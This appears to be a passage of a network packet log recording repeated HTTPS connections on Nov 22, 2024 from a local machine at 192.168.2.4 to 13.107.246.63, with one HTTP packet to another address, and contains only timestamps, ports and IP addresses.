                                                                                                                                                                                                            Nov 22, 2024 04:26:59.008872032 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.008878946 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.025073051 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.031088114 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.031101942 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.032344103 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.032350063 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338022947 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338048935 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338108063 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338135004 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338227034 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338439941 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338447094 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338468075 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338670969 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.338710070 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.339031935 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.341312885 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.341348886 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.341464996 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.341634989 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.341649055 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.357481956 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.357537985 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.357600927 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.357626915 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.357743025 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.357758999 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.357767105 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.358129025 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.358211040 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.358261108 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.360075951 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.360126972 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.360238075 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.360378981 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.360404968 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.401498079 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.401570082 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.401719093 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.402137995 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.402137995 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.402162075 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.402174950 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.404344082 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.404401064 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.404484987 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.404647112 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.404663086 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.460042000 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.460176945 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.460556030 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.460649967 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.460670948 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.460685015 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.460690975 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.462879896 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.462923050 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.462999105 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.463150978 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.463165998 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.482858896 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.482916117 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.483042955 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.483064890 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.483127117 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.483630896 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.483639002 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.483753920 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.484005928 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.484111071 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.484173059 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.486044884 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.486061096 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.486125946 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.486283064 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.486294031 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.181536913 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.182049036 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.182065964 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.183092117 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.183098078 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.200460911 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.200964928 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.200993061 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.201447010 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.201453924 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.232872009 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.233263969 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.233335972 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.233781099 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.233798981 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.238667965 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.239034891 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.239095926 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.239515066 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.239520073 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.422511101 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.423182964 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.423213005 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.423626900 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.423635960 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.625288010 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.625370026 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.625468969 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.637795925 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.637809992 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.652899027 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.652970076 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.653117895 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.659485102 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.659485102 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.659503937 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.659516096 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.664175034 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.664217949 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.664275885 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.665477037 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.665491104 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.666973114 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.667023897 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.667092085 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.667557001 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.667571068 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.673767090 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.673841953 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.673907995 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.674177885 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.674177885 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.674226046 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.674257040 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.678199053 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.678255081 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.678323984 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.682648897 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.682662010 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.682744026 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.682961941 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.683027983 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.683065891 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.683084011 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.695219994 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.695235968 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.697192907 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.697211027 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.697263956 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.697391987 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.697400093 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.876102924 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.876162052 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.876228094 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.876389027 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.876389980 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.876435995 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.876463890 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.879103899 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.879142046 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.879215956 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.879370928 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:01.879384041 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.245096922 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.245814085 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.245850086 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.246377945 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.246382952 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.450445890 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.451291084 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.451334953 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.451735020 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.451745033 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.538966894 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.539453983 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.539479971 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.540035009 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.540044069 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.541778088 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.542160988 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.542184114 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.542627096 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.542632103 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.702172041 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.702251911 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.702311039 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.702497959 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.702497959 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.702517033 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.702527046 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.705148935 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.705190897 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.705265045 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.705414057 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.705425024 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.727205038 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.727643013 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.727658987 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.728090048 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.728099108 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.941668034 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.941859007 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.941941023 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.942028999 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.942054987 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.942070007 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.942076921 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.945101023 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.945220947 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.945388079 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.945610046 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:03.945646048 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.037575006 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.037739992 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.037947893 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.038367987 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.038542032 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.038604975 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.043196917 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.043196917 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.043267012 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.043287992 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.043301105 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.043322086 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.043340921 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.043349981 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.046463966 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.046577930 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.046670914 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.046813965 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.046823978 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.046849012 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.046860933 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.046907902 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.047060013 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.047077894 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.275198936 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.275389910 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.275465965 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.275538921 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.275563955 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.275578976 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.275585890 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.278568983 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.278611898 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.278706074 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.278868914 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:04.278882027 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.519140959 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.519809008 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.519854069 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.520278931 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.520286083 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.725636959 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.726203918 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.726284981 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.726785898 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.726800919 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.866831064 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.867546082 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.867592096 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.868109941 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.868118048 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.912815094 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.913254976 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.913281918 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.913697958 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.913707018 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.961988926 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.962146997 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.962238073 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.962445974 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.962488890 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.962531090 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.962548971 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.965277910 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.965323925 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.965426922 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.965579033 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:05.965593100 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.113889933 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.132697105 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.133203983 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.133227110 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.133665085 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.133670092 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:06.169657946 CET4434986213.107.246.63192.168.2.4
